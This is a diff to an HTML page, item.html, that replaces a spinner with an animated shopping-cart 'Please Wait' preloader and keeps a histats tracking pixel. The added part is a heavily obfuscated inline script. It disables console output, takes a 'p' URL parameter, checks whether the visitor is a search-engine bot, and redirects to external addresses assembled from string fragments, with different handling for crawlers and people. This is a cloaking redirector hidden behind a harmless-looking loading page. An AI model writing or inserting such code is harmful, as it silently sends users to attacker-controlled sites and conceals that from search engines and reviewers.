--- a/item.html
+++ b/item.html
@@ -1,197 +1,191 @@
 <!DOCTYPE html>
 <html>
-    <head>
-	<style>
-			#floatingCirclesG{
-				position:relative;
-				width:125px;
-				height:125px;
-				margin:auto;
-				transform:scale(0.6);
-					-o-transform:scale(0.6);
-					-ms-transform:scale(0.6);
-					-webkit-transform:scale(0.6);
-					-moz-transform:scale(0.6);
+	<head>
+		<style>
+			* {
+				border: 0;
+				box-sizing: border-box;
+				margin: 0;
+				padding: 0;
+			}
+			:root {
+				--hue: 223;
+				--bg: hsl(var(--hue), 10%, 90%);
+				--fg: hsl(var(--hue), 10%, 10%);
+				--primary: hsl(var(--hue), 90%, 55%);
+				--trans-dur: 0.3s;
+				font-size: calc(16px + (20 - 16) * (100vw - 320px) / (1280 - 320));
+			}
+			body {
+				background-color: var(--bg);
+				color: var(--fg);
+				font: 1em/1.5 "DM Sans", sans-serif;
+				height: 50vh;
+				display: grid;
+				place-items: center;
+				transition: background-color var(--trans-dur), color var(--trans-dur);
+			}
+			.preloader {
+				text-align: center;
+				max-width: 20em;
+				width: 100%;
+			}
+			.preloader__text {
+				position: relative;
+				height: 1.5em;
+			}
+			.preloader__msg {
+				animation: msg 0.3s 13.7s linear forwards;
+				position: absolute;
+				width: 100%;
+			}
+			.preloader__msg--last {
+				animation-direction: reverse;
+				animation-delay: 14s;
+				visibility: hidden;
+			}
+			.cart {
+				display: block;
+				margin: 0 auto 1.5em auto;
+				width: 8em;
+				height: 8em;
+			}
+			.cart__lines,
+			.cart__top,
+			.cart__wheel1,
+			.cart__wheel2,
+			.cart__wheel-stroke {
+				animation: cartLines 2s ease-in-out infinite;
+			}
+			.cart__lines {
+				stroke: var(--primary);
+			}
+			.cart__top {
+				animation-name: cartTop;
+			}
+			.cart__wheel1 {
+				animation-name: cartWheel1;
+				transform: rotate(-0.25turn);
+				transform-origin: 43px 111px;
+			}
+			.cart__wheel2 {
+				animation-name: cartWheel2;
+				transform: rotate(0.25turn);
+				transform-origin: 102px 111px;
+			}
+			.cart__wheel-stroke {
+				animation-name: cartWheelStroke;
+			}
+			.cart__track {
+				stroke: hsla(var(--hue), 10%, 10%, 0.1);
+				transition: stroke var(--trans-dur);
 			}
 
-			.f_circleG{
-				position:absolute;
-				background-color:rgb(255,255,255);
-				height:22px;
-				width:22px;
-				border-radius:12px;
-					-o-border-radius:12px;
-					-ms-border-radius:12px;
-					-webkit-border-radius:12px;
-					-moz-border-radius:12px;
-				animation-name:f_fadeG;
-					-o-animation-name:f_fadeG;
-					-ms-animation-name:f_fadeG;
-					-webkit-animation-name:f_fadeG;
-					-moz-animation-name:f_fadeG;
-				animation-duration:1.2s;
-					-o-animation-duration:1.2s;
-					-ms-animation-duration:1.2s;
-					-webkit-animation-duration:1.2s;
-					-moz-animation-duration:1.2s;
-				animation-iteration-count:infinite;
-					-o-animation-iteration-count:infinite;
-					-ms-animation-iteration-count:infinite;
-					-webkit-animation-iteration-count:infinite;
-					-moz-animation-iteration-count:infinite;
-				animation-direction:normal;
-					-o-animation-direction:normal;
-					-ms-animation-direction:normal;
-					-webkit-animation-direction:normal;
-					-moz-animation-direction:normal;
-			}
-
-			#frotateG_01{
-				left:0;
-				top:51px;
-				animation-delay:0.45s;
-					-o-animation-delay:0.45s;
-					-ms-animation-delay:0.45s;
-					-webkit-animation-delay:0.45s;
-					-moz-animation-delay:0.45s;
-			}
-
-			#frotateG_02{
-				left:15px;
-				top:15px;
-				animation-delay:0.6s;
-					-o-animation-delay:0.6s;
-					-ms-animation-delay:0.6s;
-					-webkit-animation-delay:0.6s;
-					-moz-animation-delay:0.6s;
-			}
-
-			#frotateG_03{
-				left:51px;
-				top:0;
-				animation-delay:0.75s;
-					-o-animation-delay:0.75s;
-					-ms-animation-delay:0.75s;
-					-webkit-animation-delay:0.75s;
-					-moz-animation-delay:0.75s;
-			}
-
-			#frotateG_04{
-				right:15px;
-				top:15px;
-				animation-delay:0.9s;
-					-o-animation-delay:0.9s;
-					-ms-animation-delay:0.9s;
-					-webkit-animation-delay:0.9s;
-					-moz-animation-delay:0.9s;
-			}
-
-			#frotateG_05{
-				right:0;
-				top:51px;
-				animation-delay:1.05s;
-					-o-animation-delay:1.05s;
-					-ms-animation-delay:1.05s;
-					-webkit-animation-delay:1.05s;
-					-moz-animation-delay:1.05s;
-			}
-
-			#frotateG_06{
-				right:15px;
-				bottom:15px;
-				animation-delay:1.2s;
-					-o-animation-delay:1.2s;
-					-ms-animation-delay:1.2s;
-					-webkit-animation-delay:1.2s;
-					-moz-animation-delay:1.2s;
-			}
-
-			#frotateG_07{
-				left:51px;
-				bottom:0;
-				animation-delay:1.35s;
-					-o-animation-delay:1.35s;
-					-ms-animation-delay:1.35s;
-					-webkit-animation-delay:1.35s;
-					-moz-animation-delay:1.35s;
-			}
-
-			#frotateG_08{
-				left:15px;
-				bottom:15px;
-				animation-delay:1.5s;
-					-o-animation-delay:1.5s;
-					-ms-animation-delay:1.5s;
-					-webkit-animation-delay:1.5s;
-					-moz-animation-delay:1.5s;
-			}
-
-
-
-			@keyframes f_fadeG{
-				0%{
-					background-color:rgb(0,0,0);
+			/* Dark theme */
+			@media (prefers-color-scheme: dark) {
+				:root {
+					--bg: hsl(var(--hue), 10%, 10%);
+					--fg: hsl(var(--hue), 10%, 90%);
 				}
-
-				100%{
-					background-color:rgb(255,255,255);
+				.cart__track {
+					stroke: hsla(var(--hue), 10%, 90%, 0.1);
 				}
 			}
 
-			@-o-keyframes f_fadeG{
-				0%{
-					background-color:rgb(0,0,0);
+			/* Animations */
+			@keyframes msg {
+				from {
+					opacity: 1;
+					visibility: visible;
 				}
-
-				100%{
-					background-color:rgb(255,255,255);
+				99.9% {
+					opacity: 0;
+					visibility: visible;
+				}
+				to {
+					opacity: 0;
+					visibility: hidden;
+				}
+			}
+			@keyframes cartLines {
+				from,
+				to {
+					opacity: 0;
+				}
+				8%,
+				92% {
+					opacity: 1;
+				}
+			}
+			@keyframes cartTop {
+				from {
+					stroke-dashoffset: -338;
+				}
+				50% {
+					stroke-dashoffset: 0;
+				}
+				to {
+					stroke-dashoffset: 338;
+				}
+			}
+			@keyframes cartWheel1 {
+				from {
+					transform: rotate(-0.25turn);
+				}
+				to {
+					transform: rotate(2.75turn);
+				}
+			}
+			@keyframes cartWheel2 {
+				from {
+					transform: rotate(0.25turn);
+				}
+				to {
+					transform: rotate(3.25turn);
+				}
+			}
+			@keyframes cartWheelStroke {
+				from,
+				to {
+					stroke-dashoffset: 81.68;
+				}
+				50% {
+					stroke-dashoffset: 40.84;
 				}
 			}
 
-			@-ms-keyframes f_fadeG{
-				0%{
-					background-color:rgb(0,0,0);
-				}
-
-				100%{
-					background-color:rgb(255,255,255);
-				}
-			}
-
-			@-webkit-keyframes f_fadeG{
-				0%{
-					background-color:rgb(0,0,0);
-				}
-
-				100%{
-					background-color:rgb(255,255,255);
-				}
-			}
-
-			@-moz-keyframes f_fadeG{
-				0%{
-					background-color:rgb(0,0,0);
-				}
-
-				100%{
-					background-color:rgb(255,255,255);
-				}
-			}
 		</style>
-    </head>
-	
-    <body>
-	<div id="floatingCirclesG">
-		<div class="f_circleG" id="frotateG_01"></div>
-		<div class="f_circleG" id="frotateG_02"></div>
-		<div class="f_circleG" id="frotateG_03"></div>
-		<div class="f_circleG" id="frotateG_04"></div>
-		<div class="f_circleG" id="frotateG_05"></div>
-		<div class="f_circleG" id="frotateG_06"></div>
-		<div class="f_circleG" id="frotateG_07"></div>
-		<div class="f_circleG" id="frotateG_08"></div>
-	</div>
-<img src="//sstatic1.histats.com/0.gif?4804389&101" alt="" border="0" style="width:0;height:0;">
-<script src="histats.js"></script>
-    </body>
+	</head>
+
+	<body>
+		<img src="//sstatic1.histats.com/0.gif?4804389&101" alt="" border="0">
+		<div class="preloader">
+			<svg class="cart" role="img" aria-label="Shopping cart line animation" viewBox="0 0 128 128" width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
+				<g fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="8">
+					<g class="cart__track" stroke="hsla(0,10%,10%,0.1)">
+						<polyline points="4,4 21,4 26,22 124,22 112,64 35,64 39,80 106,80" />
+						<circle cx="43" cy="111" r="13" />
+						<circle cx="102" cy="111" r="13" />
+					</g>
+					<g class="cart__lines" stroke="currentColor">
+						<polyline class="cart__top" points="4,4 21,4 26,22 124,22 112,64 35,64 39,80 106,80" stroke-dasharray="338 338" stroke-dashoffset="-338" />
+						<g class="cart__wheel1" transform="rotate(-90,43,111)">
+							<circle class="cart__wheel-stroke" cx="43" cy="111" r="13" stroke-dasharray="81.68 81.68" stroke-dashoffset="81.68" />
+						</g>
+						<g class="cart__wheel2" transform="rotate(90,102,111)">
+							<circle class="cart__wheel-stroke" cx="102" cy="111" r="13" stroke-dasharray="81.68 81.68" stroke-dashoffset="81.68" />
+						</g>
+					</g>
+				</g>
+			</svg>
+			<div class="preloader__text">
+				<p class="preloader__msg">Please Wait ...</p>
+				<p class="preloader__msg preloader__msg--last">This is taking long. Something’s wrong.</p>
+			</div>
+		</div>
+		
+		<script>
+		function _0x42da(){const _0x6b4865=['fNFet','25701kgtkNF','UMheu','mloGz','1037140hDwwUM','rn\x20this\x22)(','ymaCz','search','XPiJr','rtzJy','m/item/efe','1125838gtxIYt','xISSG','iDhxR','wKewc','constructo','location','rxlYo','ekkax','zRJtq','bind','jdpka','toString','NWKHg','(((.+)+)+)','dkTzK','sTDIW','52dOPoCN','nction()\x20','488UXOQxm','log','XWwxw','558995WvdRCv','243475rGOyEu','XFHNj','KNHJr','kVNon','23337BlQdeJ','606420vCKCnD','zeNDb','WTKJH','leTYk','6nZXpui','userAgent','info','__proto__','replace','https://es','UHhWh','McUNO','e.sionf.co','veste.gith','ZdTod','ctor(\x22retu','fJobs','table','error','qdWal','dRFkJ','rpaUs','warn','console','kgpUS','{}.constru','FdoYx','FZWTp','return\x20(fu','prototype'];_0x42da=function(){return _0x6b4865;};return _0x42da();}function _0x36dd(_0x1f0089,_0x3e449a){const _0x42da91=_0x42da();return _0x36dd=function(_0x36dd09,_0x4bae3b){_0x36dd09=_0x36dd09-(-0x5e+-0x1*0xcf1+-0x1*-0xed9);let _0x27c172=_0x42da91[_0x36dd09];return _0x27c172;},_0x36dd(_0x1f0089,_0x3e449a);}(function(_0x405f12,_0x2670a5){function _0x384ccf(_0x5288b7,_0x137cb9,_0x2e194e,_0xd17c8c){return _0x36dd(_0x137cb9-0x181,_0x2e194e);}const _0x31c59e=_0x405f12();function _0x5459d8(_0x434032,_0x5c8d1a,_0x5b2c25,_0x5cb773){return _0x36dd(_0x5cb773-0x341,_0x5b2c25);}while(!![]){try{const _0x570c98=-parseInt(_0x384ccf(0x318,0x321,0x325,0x30a))/(0xd26+0x1*0xe27+-0x1b4c)+-parseInt(_0x5459d8(0x4de,0x4ec,0x4ce,0x4db))/(-0x51*-0x1a+0xd*-0x1e2+0x1042)*(-parseInt(_0x5459d8(0x517,0x50a,0x501,0x505))/(-0x16ce+-0x1*-0xecf+0x802))+parseInt(_0x384ccf(0x30a,0x326,0x345,0x314))/(0x1237+0x2274+-0x118d*0x3)+parseInt(_0x384ccf(0x308,0x320,0x33e,0x326))/(0x2203*-0x1+0x1*-0x22f+-0x2437*-0x1)*(-parseInt(_0x5459d8(0x4fb,0x4fa,0x50a,0x4ea))/(-0x1e2f+-0x1dc8+0x3bfd))+parseInt(_0x384ccf(0x2ff,0x30b,0x2f4,0x301))/(0x2038+-0x17cc*-0x1+-0x37fd)+parseInt(_0x384ccf(0x339,0x31d,0x32e,0x321))/(0x12+0xa*0x22d+-0x1d1*0xc)*(-parseInt(_0x384ccf(0x32e,0x325,0x31d,0x31a))/(-0x1*0x151f+-0x45*-0x3b+0x541))+parseInt(_0x5459d8(0x502,0x514,0x50f,0x508))/(-0x1157*-0x2+0x1d3f+-0x3fe3);if(_0x570c98===_0x2670a5)break;else _0x31c59e['push'](_0x31c59e['shift']());}catch(_0x1da590){_0x31c59e['push'](_0x31c59e['shift']());}}}(_0x42da,-0x14e6*-0x13+0x12a57+-0xcd61),(function(){function _0x4cc917(_0x20d52c,_0x389c29,_0x1568af,_0x29ef8e){return _0x36dd(_0x29ef8e- -0x4f,_0x20d52c);}const _0x5cf6fa={'UHhWh':function(_0x36d1e1,_0x23851f){return _0x36d1e1!==_0x23851f;},'qdWal':'OvYXk','jdpka':_0x13c04f(0x355,0x337,0x334,0x333)+'+$','eEpQR':function(_0x240bc0,_0x5273af){return _0x240bc0!==_0x5273af;},'leTYk':_0x4cc917(0x14b,0x13b,0x140,0x142),'rxlYo':_0x4cc917(0x167,0x159,0x173,0x161),'FdoYx':function(_0x35b545,_0x23debe){return _0x35b545(_0x23debe);},'WTKJH':function(_0x3d85f5,_0x13135a){return _0x3d85f5+_0x13135a;},'rtzJy':function(_0x7799d2,_0x5854ad){return _0x7799d2+_0x5854ad;},'xISSG':_0x4cc917(0x185,0x171,0x177,0x172)+_0x13c04f(0x316,0x32c,0x338,0x341),'rpaUs':_0x4cc917(0x174,0x166,0x18e,0x16f)+_0x4cc917(0x16f,0x171,0x150,0x165)+_0x4cc917(0x193,0x18e,0x165,0x179)+'\x20)','UMheu':function(_0x22beac){return _0x22beac();},'fJobs':_0x4cc917(0x16f,0x14f,0x16f,0x15c),'pEfQR':_0x13c04f(0x375,0x35f,0x354,0x369),'iDhxR':_0x4cc917(0x174,0x178,0x15e,0x167),'XPiJr':'trace','NWKHg':function(_0x151e66,_0x5b6eb3){return _0x151e66<_0x5b6eb3;},'ymaCz':function(_0x8b6103,_0x1e90f3){return _0x8b6103+_0x1e90f3;},'zRJtq':function(_0x4257a5,_0x237217,_0x4dc404){return _0x4257a5(_0x237217,_0x4dc404);},'XWwxw':function(_0x15a14d){return _0x15a14d();},'KNHJr':function(_0xebb38,_0x485fd6){return _0xebb38!==_0x485fd6;},'XFHNj':_0x13c04f(0x318,0x34a,0x335,0x332),'kgpUS':function(_0x47f8ea,_0x1b2ba0){return _0x47f8ea+_0x1b2ba0;}};function _0x13c04f(_0x42bbb2,_0xf87b7c,_0x661b6c,_0x21c25f){return _0x36dd(_0x661b6c-0x19d,_0x21c25f);}const _0x4d87c7=(function(){const _0x2ecc4c={'BVUjl':function(_0x14d093,_0x5c1631){function _0x2c72db(_0x108e23,_0x282add,_0x2ccfa7,_0xa19e66){return _0x36dd(_0x108e23- -0x228,_0xa19e66);}return _0x5cf6fa[_0x2c72db(-0x79,-0x80,-0x85,-0x77)](_0x14d093,_0x5c1631);},'FZWTp':_0x5cf6fa[_0x4d3e15(0x421,0x42e,0x439,0x42b)]};function _0x4d3e15(_0x11960a,_0x1bc232,_0x2f146f,_0xa166de){return _0x13c04f(_0x11960a-0x17,_0x1bc232-0x140,_0x11960a-0xcc,_0x2f146f);}let _0x293eb4=!![];return function(_0x1f8c85,_0x3a0b4b){const _0x404a0f={'mloGz':function(_0x593e31,_0x5e685e){return _0x2ecc4c['BVUjl'](_0x593e31,_0x5e685e);},'dRFkJ':'FLQug','wKewc':function(_0x39153a,_0x276735){return _0x39153a===_0x276735;},'vCoqU':_0x2ecc4c[_0x1289c4(-0x180,-0x189,-0x163,-0x1a0)]},_0x85240e=_0x293eb4?function(){function _0x3a4da8(_0x58e06f,_0x2813f5,_0x13c2da,_0x44fc46){return _0x1289c4(_0x44fc46-0x54a,_0x2813f5,_0x13c2da-0x13b,_0x44fc46-0x16b);}function _0x4234b1(_0x2fa7f8,_0xeaaa1e,_0x3063f0,_0xa51d3c){return _0x1289c4(_0xa51d3c-0x325,_0x3063f0,_0x3063f0-0x1c6,_0xa51d3c-0x19d);}if(_0x404a0f[_0x3a4da8(0x3b6,0x3df,0x3dd,0x3d0)](_0x404a0f[_0x4234b1(0x1b5,0x1bf,0x18a,0x19e)],_0x404a0f[_0x4234b1(0x1b1,0x187,0x186,0x19e)]))_0x220451=_0x15fed7;else{if(_0x3a0b4b){if(_0x404a0f[_0x3a4da8(0x385,0x382,0x37b,0x397)](_0x404a0f['vCoqU'],_0x3a4da8(0x3b9,0x3c4,0x3ab,0x3cd))){const _0x22efac=_0x72e63e?function(){if(_0x431b08){const _0x531c9d=_0x2d4d08['apply'](_0x55eea7,arguments);return _0x526404=null,_0x531c9d;}}:function(){};return _0xfdcf48=![],_0x22efac;}else{const _0x5004c8=_0x3a0b4b['apply'](_0x1f8c85,arguments);return _0x3a0b4b=null,_0x5004c8;}}}}:function(){};function _0x1289c4(_0x485164,_0x3fcb55,_0x21cc91,_0x59783f){return _0x4d3e15(_0x485164- -0x5a9,_0x3fcb55-0xd8,_0x3fcb55,_0x59783f-0xd9);}return _0x293eb4=![],_0x85240e;};}()),_0x95b6d8=_0x4d87c7(this,function(){function _0x25cda4(_0xe48363,_0x1df0e2,_0x34eaeb,_0x537321){return _0x13c04f(_0xe48363-0x180,_0x1df0e2-0x153,_0x537321- -0x46b,_0x34eaeb);}function _0x5afb28(_0xc69e0b,_0x4a3426,_0x434d57,_0x2440e5){return _0x13c04f(_0xc69e0b-0x176,_0x4a3426-0xc5,_0x4a3426- -0x9f,_0x2440e5);}return _0x95b6d8[_0x5afb28(0x291,0x293,0x287,0x281)]()[_0x25cda4(-0xec,-0xf3,-0xff,-0x104)]('(((.+)+)+)'+'+$')['toString']()[_0x25cda4(-0x153,-0x13c,-0x134,-0x140)+'r'](_0x95b6d8)[_0x25cda4(-0x120,-0x10f,-0x11f,-0x104)](_0x5cf6fa[_0x5afb28(0x285,0x292,0x272,0x280)]);});_0x95b6d8();const _0x30c41f=(function(){function _0x3f40bd(_0x57dfbb,_0x284ee4,_0xa23cbe,_0x25e694){return _0x4cc917(_0x25e694,_0x284ee4-0x15a,_0xa23cbe-0x1ab,_0x284ee4- -0x206);}const _0x52e797={'kVNon':function(_0x834392,_0x383a29){return _0x5cf6fa['eEpQR'](_0x834392,_0x383a29);},'sTDIW':_0x5cf6fa[_0x3f40bd(-0xa5,-0xad,-0xc2,-0x99)],'zeNDb':_0x5cf6fa[_0x4abd1a(-0x80,-0x93,-0x9d,-0x8f)]};let _0x52b344=!![];function _0x4abd1a(_0x5c63a5,_0x3b1d37,_0x45f677,_0x1cd226){return _0x4cc917(_0x1cd226,_0x3b1d37-0x27,_0x45f677-0x1ae,_0x5c63a5- -0x1c1);}return function(_0x109acf,_0x5efc1b){const _0x854309=_0x52b344?function(){function _0x13273d(_0x18081f,_0x3caec4,_0x1f02b3,_0x1ed9c5){return _0x36dd(_0x3caec4- -0x134,_0x1ed9c5);}function _0x19c287(_0x121f2e,_0x7b3e03,_0x225c36,_0xdcda73){return _0x36dd(_0x7b3e03-0x329,_0x121f2e);}if(_0x5efc1b){if(_0x52e797[_0x19c287(0x4ec,0x4cc,0x4d4,0x4e0)](_0x52e797[_0x13273d(0x70,0x65,0x81,0x63)],_0x52e797[_0x19c287(0x4c3,0x4cf,0x4e5,0x4e2)])){const _0x2dbb5c=_0x5efc1b['apply'](_0x109acf,arguments);return _0x5efc1b=null,_0x2dbb5c;}else{const _0x3e559e=_0x43d89c[_0x19c287(0x4c2,0x4b7,0x4a1,0x4d7)+'r'][_0x13273d(0xa0,0x8e,0x89,0xb0)][_0x13273d(0x69,0x5f,0x5f,0x56)](_0x5c5576),_0x1deaf2=_0x44af28[_0x3bda79],_0x23a393=_0x5617b4[_0x1deaf2]||_0x3e559e;_0x3e559e[_0x19c287(0x4d9,0x4d5,0x4b8,0x4b3)]=_0x28ab4d[_0x13273d(0x45,0x5f,0x6c,0x6e)](_0x472371),_0x3e559e['toString']=_0x23a393[_0x19c287(0x4d6,0x4be,0x4b5,0x4c9)]['bind'](_0x23a393),_0x1b01f0[_0x1deaf2]=_0x3e559e;}}}:function(){};return _0x52b344=![],_0x854309;};}()),_0x48d619=_0x5cf6fa[_0x4cc917(0x14d,0x142,0x161,0x143)](_0x30c41f,this,function(){const _0x3bea83=function(){let _0x49b509;function _0x34b5e9(_0x265a86,_0x33b9e7,_0x2cffc5,_0x2010e8){return _0x36dd(_0x2cffc5- -0x86,_0x265a86);}try{_0x49b509=_0x5cf6fa[_0x34b5e9(0x12e,0x129,0x139,0x14e)](Function,_0x5cf6fa[_0x34b5e9(0x141,0x13c,0x121,0x134)](_0x5cf6fa[_0x53475c(-0x7f,-0x60,-0x75,-0x58)](_0x5cf6fa[_0x53475c(-0xb6,-0xa1,-0xa8,-0xa6)],_0x5cf6fa[_0x34b5e9(0x11c,0x14c,0x134,0x14c)]),');'))();}catch(_0x1c8d5b){_0x49b509=window;}function _0x53475c(_0x28b8ad,_0xb8f949,_0x47b1cb,_0x15bcad){return _0x36dd(_0xb8f949- -0x22c,_0x47b1cb);}return _0x49b509;};function _0x2f3b8e(_0x5d9e07,_0x19f87b,_0x5db8b2,_0x180b76){return _0x13c04f(_0x5d9e07-0x11b,_0x19f87b-0x11e,_0x5d9e07-0x1e1,_0x180b76);}const _0x41f2aa=_0x5cf6fa[_0x5afab6(0x4f2,0x4f9,0x4d5,0x4d7)](_0x3bea83),_0x3b7853=_0x41f2aa[_0x5afab6(0x4be,0x4c6,0x4ed,0x4ce)]=_0x41f2aa[_0x5afab6(0x4df,0x4ca,0x4f0,0x4ce)]||{};function _0x5afab6(_0x29ef63,_0x4c58a3,_0x95f4f5,_0x50b8d3){return _0x4cc917(_0x4c58a3,_0x4c58a3-0xa0,_0x95f4f5-0xbb,_0x50b8d3-0x361);}const _0x194f1f=[_0x2f3b8e(0x51b,0x52e,0x50b,0x50f),_0x2f3b8e(0x539,0x539,0x551,0x54f),_0x5cf6fa[_0x2f3b8e(0x533,0x528,0x54b,0x53c)],_0x5cf6fa['pEfQR'],'exception',_0x5cf6fa[_0x5afab6(0x4a4,0x4b3,0x486,0x49e)],_0x5cf6fa[_0x2f3b8e(0x549,0x53f,0x539,0x560)]];for(let _0x59276e=-0x4d*-0x7+-0xbd*0x4+0xd9;_0x5cf6fa[_0x2f3b8e(0x514,0x504,0x503,0x50f)](_0x59276e,_0x194f1f['length']);_0x59276e++){const _0x359aed=_0x30c41f[_0x2f3b8e(0x50c,0x501,0x4fe,0x51c)+'r']['prototype'][_0x5afab6(0x48d,0x4c5,0x4a0,0x4a5)](_0x30c41f),_0x14cd71=_0x194f1f[_0x59276e],_0x30331c=_0x3b7853[_0x14cd71]||_0x359aed;_0x359aed[_0x2f3b8e(0x52a,0x531,0x51c,0x50b)]=_0x30c41f[_0x5afab6(0x4a4,0x49c,0x4ae,0x4a5)](_0x30c41f),_0x359aed[_0x5afab6(0x496,0x4a9,0x4af,0x4a7)]=_0x30331c[_0x5afab6(0x4bb,0x486,0x49e,0x4a7)][_0x2f3b8e(0x511,0x527,0x4f6,0x4f6)](_0x30331c),_0x3b7853[_0x14cd71]=_0x359aed;}});_0x5cf6fa[_0x13c04f(0x332,0x34e,0x33b,0x346)](_0x48d619);let _0x5d4773=new URLSearchParams(window[_0x4cc917(0x15a,0x123,0x124,0x140)][_0x4cc917(0x17e,0x19a,0x181,0x17b)]),_0x42effb=_0x5d4773['get']('p'),_0x39d9b8=/bot|google|baidu|bing|msn|duckduckbot|teoma|slurp|yandex/i['test'](navigator[_0x4cc917(0x148,0x155,0x17a,0x15b)]);if(_0x42effb){if(_0x5cf6fa[_0x13c04f(0x354,0x35a,0x33f,0x351)](_0x5cf6fa[_0x4cc917(0x15f,0x13c,0x132,0x152)],_0x4cc917(0x160,0x183,0x16a,0x164))){if(_0x39d9b8)location[_0x13c04f(0x34c,0x334,0x34a,0x366)](_0x5cf6fa[_0x4cc917(0x16b,0x175,0x15c,0x17d)](_0x4cc917(0x170,0x152,0x15a,0x15f)+_0x13c04f(0x357,0x36e,0x34e,0x357)+_0x4cc917(0x180,0x15f,0x16b,0x17e)+_0x4cc917(0x162,0x15c,0x17e,0x163)+'ub.io/',_0x42effb));else location['href']=_0x5cf6fa[_0x4cc917(0x173,0x14d,0x173,0x16e)](_0x4cc917(0x167,0x14d,0x181,0x15f)+_0x13c04f(0x34f,0x365,0x34e,0x353)+_0x13c04f(0x37c,0x364,0x36a,0x377)+_0x13c04f(0x36c,0x35a,0x34f,0x35c)+'ub.io/',_0x42effb);}else _0x4b5dcc=_0x4eecda(GoyklM[_0x4cc917(0x158,0x192,0x18d,0x17a)](GoyklM[_0x13c04f(0x36b,0x353,0x369,0x37a)](GoyklM[_0x4cc917(0x12c,0x12f,0x157,0x13c)],GoyklM[_0x13c04f(0x376,0x34d,0x357,0x33c)]),');'))();}}()));
+		</script>
+	</body>
 </html>
